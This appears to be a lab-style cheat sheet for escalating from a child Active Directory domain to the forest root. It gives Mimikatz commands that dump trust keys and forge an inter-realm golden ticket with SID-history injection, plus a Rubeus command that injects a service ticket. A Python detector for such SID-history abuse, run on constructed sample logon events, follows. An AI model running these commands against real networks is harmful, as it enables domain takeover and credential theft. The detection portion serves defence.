Escalation Requirement 🚩

Escalation Vectors 🎯

Tools

Escalation Steps

  1. Dump trust keys with Mimikatz [DA privs are required]

    Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName <DC-Name>

    Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dcorp-dc

  2. Create Inter-realm Ticket with Mimikatz

    Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:<DomainAdmin_SID> /sids:<Enterprise_Admin_SID> /rc4:<trust key hash from step 1> /service:krbtgt /target:moneycorp.local /ticket:<path to save the ticket>"'

    (dollarcorp.moneycorp.local is the child domain, moneycorp.local the forest root domain)

  3. Request service tickets with Rubeus

    Rubeus.exe asktgs /ticket:<ticket location> /service:cifs/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt

    (/service is the SPN of the target service, e.g. cifs/mcorp-dc.moneycorp.local; /dc is a root domain controller)
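The tickets above work because the forged inter-realm TGT carries the root domain's Enterprise Admins SID in its SID history (the /sids value). From the defender's side, that is the artefact to hunt for: a logon by a child-domain account whose SID history contains a privileged SID from a different domain. The detection below is an added example, not part of the original page; the event records and their field names (user_sid, sid_history) are constructed and assumed, not a real log schema.

```python
import re

# Well-known RIDs that should never arrive via SID history from another domain.
HIGH_VALUE_RIDS = {512: "Domain Admins", 518: "Schema Admins", 519: "Enterprise Admins"}

# Domain SID prefix followed by the RID, e.g. S-1-5-21-x-y-z-519.
SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")

# Constructed sample logon events (hypothetical schema). Domain SIDs are made up:
# ...1111... stands for the child domain (dcorp), ...4444... for the root (mcorp).
SAMPLE_EVENTS = [
    # Child-domain Administrator logging on with the root Enterprise Admins SID in SID history
    {"event_id": 4624, "user": "DCORP\\Administrator",
     "user_sid": "S-1-5-21-1111111111-2222222222-3333333333-500",
     "sid_history": ["S-1-5-21-4444444444-5555555555-6666666666-519"]},
    # Ordinary root-domain service account, no SID history
    {"event_id": 4624, "user": "MCORP\\svc_backup",
     "user_sid": "S-1-5-21-4444444444-5555555555-6666666666-1105",
     "sid_history": []},
    # Legitimately migrated user: cross-domain SID history, but an ordinary RID
    {"event_id": 4624, "user": "DCORP\\migrated_user",
     "user_sid": "S-1-5-21-1111111111-2222222222-3333333333-1203",
     "sid_history": ["S-1-5-21-7777777777-8888888888-9999999999-1203"]},
]


def split_sid(sid):
    """Return (domain_sid, rid) for a domain-style SID, or (None, None) if it is not one."""
    m = SID_RE.match(sid)
    if not m:
        return None, None
    return m.group(1), int(m.group(2))


def find_sid_history_abuse(events):
    """Flag logons whose SID history holds a privileged SID from a domain other than the account's own."""
    findings = []
    for ev in events:
        own_domain, _ = split_sid(ev["user_sid"])
        for extra in ev.get("sid_history", []):
            extra_domain, rid = split_sid(extra)
            if extra_domain is None or extra_domain == own_domain:
                continue  # malformed, or same-domain SID history: not a trust hop
            if rid in HIGH_VALUE_RIDS:
                findings.append({"user": ev["user"], "event_id": ev["event_id"],
                                 "sid": extra, "group": HIGH_VALUE_RIDS[rid]})
    return findings


if __name__ == "__main__":
    for f in find_sid_history_abuse(SAMPLE_EVENTS):
        print(f"ALERT: {f['user']} carries {f['group']} SID {f['sid']} via SID history")
```

Run against the constructed events it reports only the first record; the migrated user with an unprivileged cross-domain SID is left alone, which keeps the rule usable in domains with real migration history.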
